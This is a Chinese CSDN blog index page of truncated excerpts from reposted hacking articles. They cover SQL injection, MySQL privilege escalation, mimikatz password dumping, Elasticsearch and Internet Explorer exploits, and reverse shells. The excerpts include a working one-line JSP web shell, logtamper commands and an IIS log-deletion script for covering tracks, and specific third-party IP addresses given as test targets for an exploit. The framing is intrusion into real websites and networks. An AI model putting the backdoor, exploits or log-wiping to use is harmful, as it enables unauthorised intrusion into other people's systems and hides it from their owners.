Jiajia2017-CSDN博客

转载 nohup

&方式：Unix/Linux下一般想让某个程序在后台运行，很多都是使用 & 在程序结尾来让程序自动运行。比如我们要运行mysql在后台： /usr/local/mysql/bin/mysqld_safe --user=mysql &nohup方式:　但是我们很多程序并不象mysqld一样可以做成守护进程，可能我们的程序只是普通...

2015-06-14 22:15:00 194

转载 SQL注入思路与手工猜解大进阶

什么叫SQL注入？许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，（一般是在浏览器地址栏进行,通过正常的www端口访问）根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。SQL注入的思路思路最重要。其实好多人都不知道SQL到底能做什么呢？这里总结一下SQL注入入侵...

2015-06-12 17:18:00 188

转载 MYSQL提权总结

最近在测试一个项目，遇到了MYSQL数据库，想尽办法提权，最终都没有成功，很是郁闷，可能是自己很久没有研究过提权导致的吧，总结一下MYSQL提权的各种姿势吧，权当复习了。关于mysql提权的方法也就那么几种，希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Leve...

2015-06-02 16:48:00 220

转载 udf提权方法和出现问题汇总

一、适用条件1.目标系统是Windows(Win2000,XP,Win2003)；2.你已经拥有MYSQL的某个用户账号，此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。3.有root账号密码二、导出udfMYSQL 5.1以下版本导出路径：C:Winntudf.dll 2000C:Windowsudf.dll...

2015-05-28 15:36:00 382

转载 windows 2012 抓明文密码方法

mickey | 2015-05-11 11:52默认配置是抓不到明文密码了，神器mimikatz显示Password为nullAuthentication Id : 0 ; 121279 (00000000:0001d9bf)Session : Interactive from 1User Name : mickeyDomain ...

2015-05-28 10:58:00 752

转载用CPAU替代RUNAS

使用CPAU帮助受限用户安全地以管理员权限运行程序和命令在现在域管理中，经常会遇到一些程序或工具无法以普通用户权限运行，而必须用到管理员权限的情况，有的甚至于生产业务息息相关。出现这种问题的原因多种多样，如早期开发人员的认识不够，有的是为了拦截、修改某些文件而不得已采取的手段，等等。随着Vista、Windows 7的部署，问题也日渐凸显。为此，微软提供了runas命令来提升用户...

2015-05-06 13:59:00 530

转载 MS15-034 HTTP.sys (IIS) DoS And Possible Remote Code Execution – AGGIORNAMENTO CRITICO

IntroduzioneE’ stata rilevato un nuovo attacco tramite exploit verso il demone IIS (Internet Information Server) dei sistemi operativi Windows.In realtà la libreria vulnerabile si chiamaHTT...

2015-04-17 10:53:00 234

转载 php注入专题

创建时间：2005-03-09文章属性：原创文章提交：54alpha(netsh_at_163.com)php注入专题------------Alpha/*此文已发于《黑客x档案》2004年10期专题。谨以此文献给最爱我的爸爸妈妈，以及所有帮助过我的人。*//*@@@@@@@@@@@@@@@@@@@@@...

2015-03-31 11:10:00 180

转载 Mysql 另类盲注中的一些技巧

很多技巧从国外的paper学到的，不过国内没有多少人使用，所以发出来，笔记下~一、order by 的参数注入技巧：两种方法，思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法：1.[SQL] select username,password f...

2015-03-16 10:39:00 164

转载 Elasticsearch Groovy任意命令执行漏洞EXP

感谢：@lupin的分析（Elasticsearch Groovy 脚本动态执行漏洞分析和poc（CVE-2015-1427））本exp不一定正确，测试的站太少了，大家去测试测试。测试url:http://190.196.67.252:9200/_search?prettyhttp://191.234.18.14:9200///_search?pretty{"size":1,"...

2015-03-06 10:50:00 337

转载 linux好用的擦屁股工具

最近搞linux内网的时候用了一个擦脚印工具不错。是这个　logtamper_v1_1 网上都下的到，比较老的东西了，感觉不错。./logtamper-static -h root 192.168.1.9 擦除last连接./logtamper-static -w root192.168.1.9 隐藏W还有一个小技巧，一般管理查linux的时候，会...

2015-02-11 16:48:00 259

转载 jsp小后门

转自　　http://zone.wooyun.org/content/17356　　园长一：执行系统命令:无回显执行系统命令：<%Runtime.getRuntime().exec(request.getParameter("i"));%>请求：http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显，...

2014-12-18 13:31:00 1094

转载 windows2008 IIS7 Appcmd.exe

如果您运行的是 64 位 Windows，请从 %windir%\system32\inetsrv 目录而不是 %windir%\syswow64\inetsrv 目录中使用 Appcmd.exe。C:\Windows\System32\inetsrv>appcmd list VDIRVDIR "Default Web Site/" (physicalPath:%SystemD...

2014-12-11 21:24:00 224

转载 MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员http://zone.wooyun.org/content/17102https://www.t00ls.net/thread-28706-1-1.htmlhttps://github.com/bidord/pykekms14-068.py...

2014-12-11 21:04:00 236

转载 sqlmap一些常用参数

第一步：sqlmap基于Python，所以首先下载：http://yunpan.cn/QiCBLZtGGTa7U 访问密码 c26e第二步：安装Python，将sqlmap解压到Python根目录下；第三步：小试牛刀，查看sqlmap版本：python sqlmap/sqlmap.py -h第四步：通过SQL注入扫描工具扫描网站，找出怀疑...

2014-12-07 19:16:00 194

转载 mysql开启日志功能

今天要调试个程序，需要开启mysql日志功能搞了好一会没成功。最后在网上找到资料搞定，这样做个记录。首先在windows上弄，找到my.ini，按照网上的说法，在配置文件底部加入[plain]view plaincopylog="C:/temp/mysql.log"log_slow_queries="C:/temp/mysql_...

2014-12-02 16:04:00 168

转载一个人的武林：渗透测试常规思路分析（一）

写在前面渗透测试是门技术，也是一门艺术。这门技术（艺术）一开始也不是每个人都会的，正所谓没有人一出生就会走路，从不懂到入门到深谙，一步步慢慢来，每个人都是这样；但是在这个过程中，思路无疑是最重要的，没有做不到只有想不到，就跟咱们高中解题时有了思路就迎刃而解一样，手里拿着铲子（技巧知识）但不是道从何挖起岂不是悲哀。下面会分享一些我自己总结的常规渗透思路。分享的思路就像一本书...

2014-12-01 13:22:00 252

转载 JS探测内网是否存在bash漏洞，反弹shell

来t00ls几天啦，也没时间写原创。　　--（本人首发土司啦。）最近看到老外一篇文章，觉得很不错。测试了一下把这个东西把过程分享给大伙，希望大伙不要踩，忙完这几天就写原创调用一个js，扫描内网是否存在bash漏洞，然后反弹shell回来的一个小东西。搞APT应该用得到啦。测试过程：老外发的一个Poc我内网搭建测试先监听了本地250端口然后搭建之后访问1h...

2014-11-26 22:19:00 230

转载内网渗透基础：内网、域、工作组、域控概念介绍

一、什么是内网局域网（LocalAreaNetwork,LAN），又称内网，是指在某一区域内由多台计算机互联成的计算机组。局域网可以实现文件管理、应用软件共享、打印机共享、扫描仪共享、工作组内的日程安排、电子邮件和传真通信服务等功能。局域网严格意义上是封闭型的。它可以由办公室内几台甚至上千台计算机组成。决定局域网的主要技术要素为：网络拓扑，传输介质与介质访问控制方法。局域网...

2014-11-24 10:23:00 1037

转载 IIS6 日志删除脚本(t00ls)

发个很早前自己写的iis6的删除日志的vbs脚本写这个东西的原因是网上的删除iis日志工具要么报毒（懒得做免杀），要么太暴力（直接关掉IIS服务再将日志文件整个删除，坑爹呢！？）后来找了下资料发现其实要删除iis6的日志没必要把iis服务停掉，只需要把日志记录的选项关掉就行了在参考了Adsutil.vbs里面的部分代码后写了个vbs，专门用来删除iis6的日志，不用停掉iis的服务，删...

2014-11-18 14:54:00 226

转载 win95+ie3-win10+ie11 0day

alliedve.htm//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975*//<...

2014-11-14 09:49:00 190

转载树莓派打造无线扫描仪

0x00 什么是SDR？"软件无线电"(Software Defined Radio -- SDR). 实际上软件无线电技术的研究和开发已经有几十年的历史了,最初源于美军的多制式电台项目. 目前我们日常使用的移动通信系统中其实已经大量使用软件无线电技术, 比如基站中的信号处理大量的使用可编程的FPGA和DSP完成, 比如手机当中的基带处理器也越来越多的采用软解调的方法(少数运算量...

2014-11-13 19:33:00 553

转载 CVE-2014-4114利用

前段时间windows爆了个OLE包管理INF 任意代码执行漏洞，CVE-2014-4114。我利用了下，这里做个笔记。http://www.securitysift.com/windows-ole-rce-exploit-ms14-060/老外这里已经发了POC跟利用视频，但是我感觉视频不够详细，而且是用的MSF模块演示的。首先下载了老外的python脚本,然后创建一个...

2014-11-12 16:22:00 469

转载年底了，总结一下大型网站的入侵经验[t00ls转载]

事先声明：1、拒绝跨省。2、拒绝人肉，猪肉，牛肉。本文并不涉及内网。纯属经验谈，以前oldjun有写过类似的。俺这里挑不重复的补充：0x00大型某类别门户世界排名top100以内：- 低调求发展1、一个点，特别是一个超大的门户，正面进攻，搞主站绝对是不理智的。除非你有个0day把它ko掉，否则的话，我相信前面已经有n+1个人看过了。经过那么多人的洗礼，早就固若金汤了。所以我只会粗略看过，...

2014-11-12 16:09:00 368

Jiajia2017的博客